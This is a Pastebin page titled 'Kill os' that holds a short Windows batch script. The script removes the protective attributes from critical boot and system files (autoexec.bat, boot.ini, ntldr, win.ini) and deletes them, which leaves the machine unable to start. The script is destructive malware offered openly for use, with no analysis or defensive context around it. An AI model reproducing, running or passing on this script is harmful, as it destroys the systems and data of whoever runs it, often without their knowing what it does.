Advertisement
Guest User

Kill os

a guest
Oct 30th, 2014
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1.  
  2.  
  3. @echo off
  4. attrib -r -s -h c:\autoexec.bat
  5. del c:\autoexec.bat
  6. attrib -r -s -h c:\boot.ini
  7. del c:\boot.ini
  8. attrib -r -s -h c:\ntldr
  9. del c:\ntldr
  10. attrib -r -s -h c:\windows\win.ini
  11. del c:\windows\win.ini
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement